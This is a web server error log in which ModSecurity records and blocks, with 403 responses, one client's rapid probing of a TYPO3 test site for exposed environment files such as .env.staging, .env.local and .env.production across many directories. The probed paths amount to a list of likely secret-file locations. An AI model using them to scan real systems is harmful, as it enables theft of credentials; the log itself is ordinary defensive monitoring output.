[Sat Mar 21 04:10:32.850182 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.staging"] [unique_id "ab4MKBsiL8ED2XitCKA8cgAAAAI"]
[Sat Mar 21 04:10:32.850323 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/qa/.env.staging"] [unique_id "ab4MKBsiL8ED2XitCKA8cgAAAAI"]
[Sat Mar 21 04:10:33.144212 2026] [authz_core:error] [pid 2836925] [client 13.54.173.38:52002] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/properties.ini
[Sat Mar 21 04:10:33.438735 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.staging"] [unique_id "ab4MKRsiL8ED2XitCKA8dAAAAAI"]
[Sat Mar 21 04:10:33.438900 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.staging"] [unique_id "ab4MKRsiL8ED2XitCKA8dAAAAAI"]
[Sat Mar 21 04:10:33.439051 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env.staging"] [unique_id "ab4MKRsiL8ED2XitCKA8dAAAAAI"]
[Sat Mar 21 04:10:33.733458 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.staging"] [unique_id "ab4MKRsiL8ED2XitCKA8dQAAAAI"]
[Sat Mar 21 04:10:33.733616 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.staging"] [unique_id "ab4MKRsiL8ED2XitCKA8dQAAAAI"]
[Sat Mar 21 04:10:33.733759 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env.staging"] [unique_id "ab4MKRsiL8ED2XitCKA8dQAAAAI"]
[Sat Mar 21 04:10:34.027906 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.local"] [unique_id "ab4MKhsiL8ED2XitCKA8dgAAAAI"]
[Sat Mar 21 04:10:34.028072 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.local"] [unique_id "ab4MKhsiL8ED2XitCKA8dgAAAAI"]
[Sat Mar 21 04:10:34.028227 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/prod/.env.local"] [unique_id "ab4MKhsiL8ED2XitCKA8dgAAAAI"]
[Sat Mar 21 04:10:34.322442 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /stg/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env"] [unique_id "ab4MKhsiL8ED2XitCKA8dwAAAAI"]
[Sat Mar 21 04:10:34.322618 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env"] [unique_id "ab4MKhsiL8ED2XitCKA8dwAAAAI"]
[Sat Mar 21 04:10:34.322788 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/stg/.env"] [unique_id "ab4MKhsiL8ED2XitCKA8dwAAAAI"]
[Sat Mar 21 04:10:34.616909 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "ab4MKhsiL8ED2XitCKA8eAAAAAI"]
[Sat Mar 21 04:10:34.617080 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "ab4MKhsiL8ED2XitCKA8eAAAAAI"]
[Sat Mar 21 04:10:34.617221 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "ab4MKhsiL8ED2XitCKA8eAAAAAI"]
[Sat Mar 21 04:10:34.911333 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "ab4MKhsiL8ED2XitCKA8eQAAAAI"]
[Sat Mar 21 04:10:34.911493 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "ab4MKhsiL8ED2XitCKA8eQAAAAI"]
[Sat Mar 21 04:10:34.911654 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "ab4MKhsiL8ED2XitCKA8eQAAAAI"]
[Sat Mar 21 04:10:35.206757 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.staging"] [unique_id "ab4MKxsiL8ED2XitCKA8egAAAAI"]
[Sat Mar 21 04:10:35.206980 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.staging"] [unique_id "ab4MKxsiL8ED2XitCKA8egAAAAI"]
[Sat Mar 21 04:10:35.207179 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env.staging"] [unique_id "ab4MKxsiL8ED2XitCKA8egAAAAI"]
[Sat Mar 21 04:10:35.501115 2026] [authz_core:error] [pid 2836925] [client 13.54.173.38:52002] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.dist
[Sat Mar 21 04:10:35.795555 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.production"] [unique_id "ab4MKxsiL8ED2XitCKA8fAAAAAI"]
[Sat Mar 21 04:10:35.795711 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.production"] [unique_id "ab4MKxsiL8ED2XitCKA8fAAAAAI"]
[Sat Mar 21 04:10:35.795872 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env.production"] [unique_id "ab4MKxsiL8ED2XitCKA8fAAAAAI"]
[Sat Mar 21 04:10:36.090642 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /client/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.local"] [unique_id "ab4MLBsiL8ED2XitCKA8fQAAAAI"]
[Sat Mar 21 04:10:36.090873 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.local"] [unique_id "ab4MLBsiL8ED2XitCKA8fQAAAAI"]
[Sat Mar 21 04:10:36.091095 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/client/.env.local"] [unique_id "ab4MLBsiL8ED2XitCKA8fQAAAAI"]
[Sat Mar 21 04:10:36.385298 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apis/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.staging"] [unique_id "ab4MLBsiL8ED2XitCKA8fgAAAAI"]
[Sat Mar 21 04:10:36.385457 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.staging"] [unique_id "ab4MLBsiL8ED2XitCKA8fgAAAAI"]
[Sat Mar 21 04:10:36.385611 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apis/.env.staging"] [unique_id "ab4MLBsiL8ED2XitCKA8fgAAAAI"]
[Sat Mar 21 04:10:36.679861 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env"] [unique_id "ab4MLBsiL8ED2XitCKA8fwAAAAI"]
[Sat Mar 21 04:10:36.680026 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env"] [unique_id "ab4MLBsiL8ED2XitCKA8fwAAAAI"]
[Sat Mar 21 04:10:36.680192 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public_html/.env"] [unique_id "ab4MLBsiL8ED2XitCKA8fwAAAAI"]
[Sat Mar 21 04:10:36.974571 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /production/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ab4MLBsiL8ED2XitCKA8gAAAAAI"]
[Sat Mar 21 04:10:36.974752 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ab4MLBsiL8ED2XitCKA8gAAAAAI"]
[Sat Mar 21 04:10:36.975328 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/production/.env"] [unique_id "ab4MLBsiL8ED2XitCKA8gAAAAAI"]
[Sat Mar 21 04:10:37.269481 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /user/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env"] [unique_id "ab4MLRsiL8ED2XitCKA8gQAAAAI"]
[Sat Mar 21 04:10:37.269635 2026] [:error] [pid 2836925] [client 13.54.173.38:52002] [client 13.54.173.38] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/user/.env"] [unique_id "ab4MLRsiL8ED2XitCKA8gQAAAAI"]
